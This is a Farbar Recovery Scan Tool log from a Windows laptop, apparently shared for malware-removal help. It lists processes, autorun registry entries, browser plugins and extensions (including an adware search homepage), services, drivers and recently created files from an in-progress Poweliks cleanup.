(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
() C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\STService.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
(Microsoft Corporation) C:\Windows\System32\vds.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(Intel® Corporation) C:\Program Files\Intel\WiMAX\Bin\WiMAXCU.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2122536 2010-05-07] (Synaptics Incorporated)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10144288 2010-04-13] (Realtek Semiconductor)
HKLM\...\Run: [IntelWireless] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1928976 2010-03-05] (Intel® Corporation)
HKLM\...\Run: [IntelWirelessWiMAX] => C:\Program Files\Intel\WiMAX\Bin\WiMAXCU.exe [1449984 2010-10-03] (Intel® Corporation)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7021880 2016-01-13] (AVAST Software)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-12-22] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
HKLM-x32\...\RunOnce: [Launcher] => C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\Launcher.exe [163040 2010-08-11] (Softthinks)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Run: [Google Update] => C:\Users\Owner\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-31] (Google Inc.)
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [899584 2010-11-20] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-01-13] (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Owner\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk [2011-01-17]
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (Microsoft)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2011-01-17]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk [2011-01-17]
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (Microsoft)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2011-01-17]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\postgres\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk [2011-01-17]
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (Microsoft)
Startup: C:\Users\postgres\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2011-01-17]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{078B087B-2F04-441C-B898-582CCC5D9236}: [DhcpNameServer] 68.111.16.25 68.111.16.30
Tcpip\..\Interfaces\{3DE5FF03-1AB6-480F-8FF4-A748166BC0F6}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{709B40FF-8646-458D-9811-B527DD3EB7C2}: [NameServer] 0.0.0.0
 
Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-01-13] (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_72\bin\ssv.dll [2016-01-27] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-01-13] (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_72\bin\jp2ssv.dll [2016-01-27] (Oracle Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2011-10-10] (Skype Technologies S.A.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2016-01-14] ()
FF Plugin: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll [2010-10-13] (Best Buy)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2016-01-14] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll [2010-10-13] (Best Buy)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-07-12] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.72.2 -> C:\Program Files (x86)\Java\jre1.8.0_72\bin\dtplugin\npDeployJava1.dll [2016-01-27] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.72.2 -> C:\Program Files (x86)\Java\jre1.8.0_72\bin\plugin2\npjp2.dll [2016-01-27] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @spoon.net/Spoon Plugin 3.33 -> C:\Users\Owner\AppData\Local\Spoon\3.33.6.244\npMozillaSpoonPlugin.dll [No File]
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @talk.google.com/O1DPlugin -> C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-2923065098-2265594029-2962721977-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Owner\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Owner\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Owner\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-01-13]
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-01-13]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://search.conduit.com/?ctid=CT3324790&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=4&UP=SPD5AB1073-39FB-4384-AAB4-904BCB7A9792&SSPV=SE1CG2_sp_ch
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Angry Birds) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj [2014-12-14]
CHR Extension: (BeFunky Photo Editor) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apfkepiiddolifkgjmfdgpnipgnfejab [2015-04-13]
CHR Extension: (Cloud To Butt Plus) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apmlngnhgbnjpajelfkmabhkfapgnoai [2015-02-26]
CHR Extension: (Ebates Cash Back) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\chhjbpecpncaggjpdakmflnfcopglcmi [2016-01-13]
CHR Extension: (timeStats) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejifodhjoeeenihgfpjijjmpomaphmah [2015-06-04]
CHR Extension: (AdBlock) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-02-04]
CHR Extension: (Emoji Input by EmojiStuff.com) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\immhpnclomdloikkpcefncmfgjbkojmh [2016-01-02]
CHR Extension: (Cargo Bridge) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\keembkgclppcbilkekfgpobhldjjhpmn [2014-08-28]
CHR Extension: (Little Alchemy) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\knkapnclbofjjgicpkfoagdjohlfjhpd [2016-02-10]
CHR Extension: (Skype) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-01-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-30]
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-28]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-28]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-28]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-02-28]
CHR Extension: (Google Search) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-13]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-28]
CHR Extension: (Avast Online Security) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gomekmidlodglbbmalcneegieacbdmki [2015-04-13]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-06-18]
CHR Extension: (Skype Click to Call) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-05-19]
CHR Extension: (Google Wallet) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-05-19]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-13]
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-03-01]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-01]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-03-01]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-03-01]
CHR Extension: (Google Search) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-13]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-03-01]
CHR Extension: (Avast Online Security) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\gomekmidlodglbbmalcneegieacbdmki [2015-04-13]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-04-13]
CHR Extension: (Skype Click to Call) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-04-13]
CHR Extension: (Google Wallet) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-04-13]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-13]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-01-13]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2011-10-10]
StartMenuInternet: Google Chrome - C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [226440 2016-01-13] (AVAST Software)
R2 DMAgent; C:\Program Files\Intel\WiMAX\Bin\DMAgent.exe [606720 2010-09-28] (Red Bend Ltd.) [File not signed]
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2009-06-09] (Stardock Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2010-03-05] ()
R2 WiMAXAppSrv; C:\Program Files\Intel\WiMAX\Bin\AppSrv.exe [911872 2010-09-28] (Intel® Corporation) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [28656 2016-01-13] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [97648 2016-01-13] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2016-01-13] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65224 2016-01-13] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1065208 2016-01-27] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [464256 2016-01-27] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [155304 2016-01-13] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [273784 2016-01-13] (AVAST Software)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-17] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-17] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-11-25] (Avira Operations GmbH & Co. KG)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2012-12-13] (Apple, Inc.) [File not signed]
S3 BTCFilterService; system32\DRIVERS\motfilt.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 motandroidusb; System32\Drivers\motoandroid.sys [X]
S3 motccgp; system32\DRIVERS\motccgp.sys [X]
S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]
S3 motmodem; system32\DRIVERS\motmodem.sys [X]
S3 MotoSwitchService; system32\DRIVERS\motswch.sys [X]
S3 Motousbnet; system32\DRIVERS\Motousbnet.sys [X]
S3 motusbdevice; system32\DRIVERS\motusbdevice.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-04 15:45 - 2016-02-04 15:45 - 00000022 _____ C:\Users\Owner\Desktop\ESETPoweliksCleaner.exe_20160204.154526.2296.zip
2016-02-04 15:44 - 2016-02-04 15:44 - 00000022 _____ C:\Users\Owner\Desktop\ESETPoweliksCleaner.exe_20160204.154422.6140.zip
2016-02-04 15:42 - 2016-02-04 15:42 - 00224968 _____ (ESET) C:\Users\Owner\Desktop\ESETPoweliksCleaner.exe
2016-02-04 15:29 - 2016-02-04 15:32 - 00018729 _____ C:\Users\Owner\Desktop\Fixlog.txt
2016-02-03 00:56 - 2016-02-10 02:20 - 00024614 _____ C:\Users\Owner\Desktop\FRST.txt
2016-02-03 00:53 - 2016-02-03 00:53 - 02370560 _____ (Farbar) C:\Users\Owner\Desktop\FRST64.exe
2016-02-01 00:22 - 2016-02-01 00:22 - 00320918 _____ C:\Users\Owner\Documents\Erin Hiraide PDF.pdf
2016-01-31 20:19 - 2016-01-31 20:19 - 00000000 ____D C:\Users\Owner\AppData\Roaming\{90140011-0066-0409-0000-0000000FF1CE}
2016-01-31 20:18 - 2016-01-31 20:18 - 00000000 ____D C:\ProgramData\Virtualized Applications
2016-01-31 19:36 - 2016-02-02 03:36 - 00000000 ____D C:\ProgramData\Package Cache
2016-01-27 21:22 - 2016-01-27 21:22 - 52988120 _____ (Microsoft Corporation) C:\Users\Owner\Desktop\Windows-KB890830-x64-V5.32.exe
2016-01-27 17:32 - 2015-12-11 10:57 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-01-27 17:32 - 2015-12-08 13:54 - 02285056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2016-01-27 17:32 - 2015-12-08 13:54 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 01568768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 01325056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00902144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00815616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00740352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
2016-01-27 17:32 - 2015-12-08 13:54 - 00739328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00541184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00358400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00154112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00970240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00609280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
